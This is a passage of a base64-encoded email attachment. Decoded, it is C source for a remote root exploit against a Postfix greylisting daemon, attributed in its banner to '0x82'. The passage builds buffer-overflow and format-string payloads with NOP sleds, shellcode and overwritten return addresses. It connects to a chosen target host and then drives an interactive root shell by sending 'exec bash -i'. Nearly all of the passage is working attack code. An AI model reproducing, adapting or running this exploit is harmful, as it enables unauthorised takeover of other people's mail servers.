Ki8KCQkJZm9yKGI9MDtiPHNpemUqNDtiKz00KQoJCQkJKihsb25nICopJmNv
ZGVfYnVmW2JdPXNoZWxsOwoKCQkJc25wcmludGYodF9hdGssc2l6ZW9mKHRf
YXRrKS0xLAoJCQkJInNlbmRlcj0lc1xyXG4iCgkJCQkiY2xpZW50X2FkZHJl
c3M9JXNcclxuXHJcbiIsbm9wX3NoZWxsLGNvZGVfYnVmKTsKCQkJYnJlYWs7
CgoJCWNhc2UgMToKCQkJZnByaW50ZihzdGRvdXQsIiAjIG1ldGhvZDogam1w
IColJWVzcCBleHBsb2l0OiAlZCBieXRlXG4iLHNpemUpOwoJCQkvKiBzZW5k
ZXIgYnVmZmVyICovCgkJCWZvcihhPTA7YTwxMDAwO2ErKykKCQkJCW5vcF9z
aGVsbFthXT0nTic7CgkJCS8qIGNsaWVudF9hZGRyZXNzIGJ1ZmZlciAqLwoJ
CQlmb3IoYj0wO2I8c2l6ZSo0O2IrPTQpCgkJCQkqKGxvbmcgKikmY29kZV9i
dWZbYl09MHg4MjgyODI4MjsKCQkJLyogZWJwICovCgkJCSoobG9uZyAqKSZj
b2RlX2J1ZltiXT0weDQxNDE0MTQxOwoJCQliKz00OwoJCQkvKiBlaXAgKGpt
cCAqJWVzcCkgKi8KCQkJKihsb25nICopJmNvZGVfYnVmW2JdPShzaGVsbCk7
CgkJCWIrPTQ7CgkJCS8qIGptcCBub3AgKDB4ZWIsMHgwOCkgKi8KCQkJKihs
b25nICopJmNvZGVfYnVmW2JdPTB4MDhlYjA4ZWI7CgkJCWIrPTQ7CgkJCS8q
IGR1bW15LCBub3AgKi8KCQkJLy8gMHgwODA0ZDI4MCAweGJmZmZlMWM4IDB4
MDgwNDk1MjEKCQkJKihsb25nICopJmNvZGVfYnVmW2JdPTB4MDgwNGQyODA7
CgkJCWIrPTQ7CgkJCSoobG9uZyAqKSZjb2RlX2J1ZltiXT0weDkwOTA5MDkw
Oy8vMHhiZmZmZTFjODsKCQkJYis9NDsKCQkJKihsb25nICopJmNvZGVfYnVm
W2JdPTB4OTA5MDkwOTA7Ly8weDA4MDQ5NTIxOwoJCQliKz00OwoJCQkqKGxv
bmcgKikmY29kZV9idWZbYl09MHg5MDkwOTA5MDsKCQkJYis9NDsKCQkJLyog
c2hlbGxjb2RlICovCgkJCWZvcihhPTA7YTxzdHJsZW4oc2hlbGxjb2RlKTth
KyspCgkJCQljb2RlX2J1ZltiKytdPXNoZWxsY29kZVthXTsKCgkJCXNucHJp
bnRmKHRfYXRrLHNpemVvZih0X2F0ayktMSwKCQkJCSJzZW5kZXI9JXNcclxu
IgoJCQkJImNsaWVudF9hZGRyZXNzPSVzXHJcblxyXG4iLG5vcF9zaGVsbCxj
b2RlX2J1Zik7Cgl9Cn0KCmludCBtYWtlX2ZtdF9jb2RlKHVuc2lnbmVkIGxv
bmcgcmV0bG9jLHVuc2lnbmVkIGxvbmcgc2hlbGwsaW50IHNmbGFnKQp7Cgl1
bnNpZ25lZCBjaGFyIGhlYWRlclsyNTZdOwoJdW5zaWduZWQgY2hhciBub3Bf
c2hlbGxbODE5Ml07CglpbnQgYSxiLGMsZCxlLGY7CglpbnQgYWRkcjEsYWRk
cjIsYWRkcjMsYWRkcjQ7CglhPWI9Yz1kPWU9Zj1hZGRyMT1hZGRyMj1hZGRy
Mz1hZGRyND0wOwoKCW1lbXNldCgoY2hhciAqKWhlYWRlciwwLHNpemVvZiho
ZWFkZXIpKTsKCW1lbXNldCgoY2hhciAqKW5vcF9zaGVsbCwwLHNpemVvZihu
b3Bfc2hlbGwpKTsKCW1lbXNldCgoY2hhciAqKXRfYXRrLDAsc2l6ZW9mKHRf
YXRrKSk7CgoJZnByaW50ZihzdGRvdXQsIiAjIE1ha2UgZm9ybWF0IHN0cmlu
ZywgLmR0b3JzOiAlcFxuIixyZXRsb2MpOwoKCSoobG9uZyAqKSZoZWFkZXJb
MF09cmV0bG9jKzA7CgkqKGxvbmcgKikmaGVhZGVyWzRdPXJldGxvYysxOwoJ
Kihsb25nICopJmhlYWRlcls4XT1yZXRsb2MrMjsKCSoobG9uZyAqKSZoZWFk
ZXJbMTJdPXJldGxvYyszOwoKCWE9KHNoZWxsPj4yNCkmMHhmZjsKCWFkZHIx
PShzaGVsbD4+MjQpJjB4ZmY7CgliPShzaGVsbD4+MTYpJjB4ZmY7CglhZGRy
Mj0oc2hlbGw+PjE2KSYweGZmOwoJYz0oc2hlbGw+PjgpJjB4ZmY7CglhZGRy
Mz0oc2hlbGw+PjgpJjB4ZmY7CglkPShzaGVsbD4+MCkmMHhmZjsKCWFkZHI0
PShzaGVsbD4+MCkmMHhmZjsKCglpZigoYWRkcjQtMTYtNjUpPDEwKWQrPTB4
MTAwOwoJaWYoKGFkZHIzLWFkZHI0KTwxMCljKz0weDEwMDsKCWlmKChhZGRy
Mi1hZGRyMyk8MTApYis9MHgxMDA7CgoJZm9yKGU9MDtlPDMyMC1zdHJsZW4o
c2hlbGxjb2RlKTtlKyspCgkJbm9wX3NoZWxsW2VdPSdOJzsKCWZvcihmPTA7
ZjxzdHJsZW4oc2hlbGxjb2RlKTtmKyspCgkJbm9wX3NoZWxsW2UrK109c2hl
bGxjb2RlW2ZdOwoKCWZwcmludGYoc3Rkb3V0LCIgI1xuICMgc2hlbGxjb2Rl
IGFkZHI6ICVwLCBzaXplOiAlZCBieXRlXG4iLHNoZWxsLHN0cmxlbihub3Bf
c2hlbGwpKTsKCXNucHJpbnRmKHRfYXRrLHNpemVvZih0X2F0ayktMSwKCQki
Y2xpZW50X2FkZHJlc3M9JXMiIC8qIGhlYWRlciAqLwoJCSIlJSV1eCUlJWQk
biUlJXV4JSUlZCRuJSUldXglJSVkJG4lJSV1eCUlJWQkbiIgLyogZm10IGNv
ZGUgKi8KCQkiJXNcclxuXHJcbiIsIC8qIHNoZWxsY29kZSAqLwoJCWhlYWRl
cixkLTE2LTY1LChzZmxhZyswKSxjLWFkZHI0LChzZmxhZysxKSxiLWFkZHIz
LAoJCShzZmxhZysyKSwweDEwMCthLWFkZHIyLChzZmxhZyszKSxub3Bfc2hl
bGwpOwp9Cgp2b2lkIHJlX2Nvbm50KGludCBzb2NrKQp7CglpZihzb2NrPT0t
MSkKCXsKCQlmcHJpbnRmKHN0ZG91dCwiICNcbiAjIEZhaWxlZC5cbiIpOwoJ
CWZwcmludGYoc3Rkb3V0LCIgIyBIYXBweSBFeHBsb2l0ICEgOi0pXG4gI1xu
XG4iKTsKCQlleGl0KC0xKTsKCX0KfQogCmludCBzZXRzb2NrKGNoYXIgKmhv
c3QsaW50IHBvcnQpCnsKCWludCBzb2NrOwoJc3RydWN0IGhvc3RlbnQgKmhl
OwoJc3RydWN0IHNvY2thZGRyX2luIHg4Ml9hZGRyOwogCglpZigoaGU9Z2V0
aG9zdGJ5bmFtZShob3N0KSk9PU5VTEwpCgl7CgkJaGVycm9yKCIgIyBnZXRo
b3N0YnluYW1lKCkgZXJyb3IiKTsKCQlyZXR1cm4oLTEpOwoJfQoKCWlmKChz
b2NrPXNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApKT09RU9GKQoJewoJ
CXBlcnJvcigiICMgc29ja2V0KCkgZXJyb3IiKTsKCQlyZXR1cm4oLTEpOwoJ
fQogICAgCgl4ODJfYWRkci5zaW5fZmFtaWx5PUFGX0lORVQ7Cgl4ODJfYWRk
ci5zaW5fcG9ydD1odG9ucyhwb3J0KTsKCXg4Ml9hZGRyLnNpbl9hZGRyPSoo
KHN0cnVjdCBpbl9hZGRyICopaGUtPmhfYWRkcik7CgliemVybygmKHg4Ml9h
ZGRyLnNpbl96ZXJvKSw4KTsKIAoJaWYoY29ubmVjdChzb2NrLChzdHJ1Y3Qg
c29ja2FkZHIgKikmeDgyX2FkZHIsc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikp
PT1FT0YpCgl7CgkJcGVycm9yKCIgIyBjb25uZWN0KCkgZXJyb3IiKTsKCQly
ZXR1cm4oLTEpOwoJfQoJcmV0dXJuKHNvY2spOwp9Cgp2b2lkIGNvbm5fc2hl
bGwoaW50IHNvY2spCnsKCWludCBwY2t0OwoJY2hhciAqY21kPSJ1bmFtZSAt
YTtpZDtleHBvcnQgVEVSTT12dDEwMDtleGVjIGJhc2ggLWlcbiI7CgljaGFy
IHJidWZbMTAyNF07CglmZF9zZXQgcnNldDsKCW1lbXNldCgoY2hhciAqKXJi
dWYsMCwxMDI0KTsKICAgIAoJZnByaW50ZihzdGRvdXQsIiAjXG4gIyBLaWxs
IHR3byBiaXJkIHdpdGggb25lIHN0b25lIVxuIik7CglmcHJpbnRmKHN0ZG91
dCwiICMgT0ssIEl0J3MgUm9vdHNoZWxsXG4gI1xuXG4iKTsKCXNlbmQoc29j
ayxjbWQsc3RybGVuKGNtZCksMCk7CgoJd2hpbGUoMSkKCXsKCQlmZmx1c2go
c3Rkb3V0KTsKCQlGRF9aRVJPKCZyc2V0KTsKCQlGRF9TRVQoc29jaywmcnNl
dCk7CgkJRkRfU0VUKFNURElOX0ZJTEVOTywmcnNldCk7CgkJc2VsZWN0KHNv
Y2srMSwmcnNldCxOVUxMLE5VTEwsTlVMTCk7CgkKCQlpZihGRF9JU1NFVChz
b2NrLCZyc2V0KSkKCQl7CgkJCXBja3Q9cmVhZChzb2NrLHJidWYsMTAyNCk7
CgkJCWlmKHBja3Q8PTApCgkJCXsKCQkJCWZwcmludGYoc3Rkb3V0LCIgI1xu
ICMgSGFwcHkgRXhwbG9pdCAhXG4gI1xuXG4iKTsKCQkJCWV4aXQoMCk7CgkJ
CX0KCQkJcmJ1ZltwY2t0XT0wOwoJCQlwcmludGYoIiVzIixyYnVmKTsKCQl9
CgkJaWYoRkRfSVNTRVQoU1RESU5fRklMRU5PLCZyc2V0KSkKCQl7CgkJCXBj
a3Q9cmVhZChTVERJTl9GSUxFTk8scmJ1ZiwxMDI0KTsKCQkJaWYocGNrdD4w
KQoJCQl7CgkJCQlyYnVmW3Bja3RdPTA7CgkJCQl3cml0ZShzb2NrLHJidWYs
cGNrdCk7CgkJCX0KCQl9Cgl9CglyZXR1cm47Cn0KCnZvaWQgYmFucmwoKQp7
CglmcHJpbnRmKHN0ZG91dCwiXG4gI1xuICMgMHg4Mi1tZU93X2xpbnV4ZXJf
Zm9yZXZlciAtIEdyZXlsaXN0aW5nIGRhZW1vbiBmb3IgUG9zdGZpeCByZW1v
dGUgZXhwbG9pdFxuIik7CglmcHJpbnRmKHN0ZG91dCwiICMgc3pvYWhjKGF0
KWhvdG1haWwoZG90KWNvbVxuICNcblxuIik7Cn0KCnZvaWQgdXNhZ2UoY2hh
ciAqYXJncykKewoJaW50IGk7CglmcHJpbnRmKHN0ZG91dCwiIFVzYWdlOiAl
cyAtb3B0aW9ucyBhcmd1bWVudHNcblxuIixhcmdzKTsKCWZwcmludGYoc3Rk
b3V0LCJcdC1yIFtyZXRsb2NdICAgICAgICAtIC5kdG9ycyBhZGRyZXNzLlxu
Iik7CglmcHJpbnRmKHN0ZG91dCwiXHQtcyBbc2hlbGxdICAgICAgICAgLSBz
aGVsbGNvZGUgYWRkcmVzcy5cbiIpOwoJZnByaW50ZihzdGRvdXQsIlx0LWYg
W2ZsYWcgbnVtXSAgICAgIC0gJC1mbGFnIGNvdW50LlxuIik7CglmcHJpbnRm
KHN0ZG91dCwiXHQtaCBbaG9zdF0gICAgICAgICAgLSB0YXJnZXQgaG9zdG5h
bWUuXG4iKTsKCWZwcmludGYoc3Rkb3V0LCJcdC10IFt0eXBlIG51bV0gICAg
ICAtIHRhcmdldCBudW1iZXIuXG4iKTsKCWZwcmludGYoc3Rkb3V0LCJcdC1p
ICAgICAgICAgICAgICAgICAtIGhlbHAgaW5mb3JtYXRpb24uXG5cbiIpOwoK
CWZwcmludGYoc3Rkb3V0LCIgLSBUYXJnZXQgVHlwZSBOdW1iZXIgTGlzdCAt
XG5cbiIpOwoJZm9yKGk9MDtwbGF0Zm9ybVtpXS5vc190eXBlIT1OVUxMO2kr
KykKCXsKCQlmcHJpbnRmKHN0ZG91dCwiIHslZH0gOiAlc1xuIixpLHBsYXRm
b3JtW2ldLm9zX3R5cGUpOwoJfQoJZnByaW50ZihzdGRvdXQsIlxuIEV4YW1w
bGU6ICVzIC10IDAgLWggbG9jYWxob3N0XG4iLGFyZ3MpOwoJZnByaW50Zihz
dGRvdXQsIiBFeGFtcGxlOiAlcyAtciAweDgyODI4MjgyIC1zIDB4ODI4Mjgy
ODIgLWYgMTVcblxuIixhcmdzKTsKCWV4aXQoMCk7Cn0KCi8qIGVveCAqLwoK
------------=_1113266468-3900-0--
